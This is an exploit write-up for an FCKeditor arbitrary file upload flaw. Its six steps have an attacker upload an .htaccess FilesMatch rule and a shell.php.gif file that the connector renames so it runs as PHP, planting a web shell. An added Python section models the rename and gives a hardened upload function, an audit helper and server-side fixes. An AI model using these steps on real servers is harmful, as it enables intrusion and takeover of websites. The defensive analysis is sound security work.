FCKeditor Arbitrary File Upload Vulnerability (all PHP versions)
Author: anonymous  Source: compiled by this site  Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create an .htaccess file:
code:
# Any file in this directory whose name contains "_php.gif" is handed to the
# PHP engine, whatever its extension. The pattern is an unanchored regex:
# "." matches any character and there is no "$" anchor. Straight ASCII quotes
# are required; Apache does not parse the curly quotes found in some copies.
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
2. Now upload this .htaccess through FCKeditor. This step only pays off if Apache honours per-directory overrides in the upload folder (AllowOverride FileInfo or All, which SetHandler needs) and the connector does not refuse the name ".htaccess". The upload test pages are:

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html

http://www.sinesafe.cn/FCKeditor ... onnectors/test.html

———————————————————————————————-
3. Now upload shell.php.gif through FCKeditor.
4. After the upload, the name "shell.php.gif" is changed to "shell_php.gif" automatically: the connector rewrites every dot except the last one as an underscore, which produces exactly the string the FilesMatch rule above targets.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. The shell is now reachable on the server.
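The six steps above, modelled end to end as an added Python example (this is not code from the original page or from FCKeditor): the rename the page reports in step 4 is reconstructed as an assumed regex, the .htaccess from step 1 is matched the way Apache's unanchored FilesMatch treats it, and a hardened store step plus a small audit helper show the defender's side. The function names, the extension allow-list and the directory listing are all constructed for the example.

```python
import re
import secrets

# --- attacker-side view: what the page's steps do ---

# Assumed model of the rename the page reports in step 4: every dot except the
# last becomes "_", so "shell.php.gif" is stored as "shell_php.gif". This is a
# reconstruction of the observed behaviour, not FCKeditor's own code.
def legacy_rename(name):
    return re.sub(r"\.(?=.*\.)", "_", name)

# The rule from step 1. It is an unanchored regex: "." matches any character
# and there is no "$", so it also matches names such as "x_phpXgif".
HTACCESS = (
    '<FilesMatch "_php.gif">\n'
    'SetHandler application/x-httpd-php\n'
    '</FilesMatch>\n'
)

def php_handler_patterns(htaccess_text):
    """Return the FilesMatch patterns whose block sets a PHP handler."""
    out = []
    for m in re.finditer(r'<FilesMatch\s+"([^"]+)">(.*?)</FilesMatch>',
                         htaccess_text, re.S | re.I):
        if re.search(r'SetHandler\s+application/x-httpd-php', m.group(2), re.I):
            out.append(m.group(1))
    return out

def executed_as_php(stored_name, htaccess_text):
    """Would Apache hand this stored file to PHP, given the uploaded .htaccess?
    Assumes AllowOverride permits FileInfo, which SetHandler requires."""
    return any(re.search(p, stored_name) for p in php_handler_patterns(htaccess_text))

# --- defender-side: a store step that leaks nothing of the original name ---

SAFE_EXTS = {"gif", "jpg", "jpeg", "png"}   # assumed allow-list for an image folder

def hardened_store_name(name, token=None):
    """Store under a random name with an allow-listed extension, and refuse
    dotfiles so .htaccess can never land in the upload directory. Because the
    client-supplied stem is discarded, "_php" never survives into the stored name."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    if base.startswith("."):
        raise ValueError("dotfiles are not accepted")
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in SAFE_EXTS:
        raise ValueError("extension %r not allowed" % ext)
    return "%s.%s" % (token or secrets.token_hex(8), ext)

def audit_upload_dir(listing, htaccess_text):
    """Incident-response helper: names in an upload directory that the
    uploaded .htaccess would execute as PHP. `listing` is a constructed list."""
    return [n for n in listing if executed_as_php(n, htaccess_text)]

if __name__ == "__main__":
    stored = legacy_rename("shell.php.gif")
    print(stored, executed_as_php(stored, HTACCESS))          # shell_php.gif True
    print(hardened_store_name("shell.php.gif", token="deadbeef"))  # deadbeef.gif
    print(audit_upload_dir(["logo.gif", "shell_php.gif", "notes.txt"], HTACCESS))
```

The two defences that actually close this hole are independent of the name check: serve the upload directory with overrides disabled (AllowOverride None) so an uploaded .htaccess is inert, and never let the client-controlled stem reach the filesystem. The audit helper is the quick triage pass for a directory where both were missing.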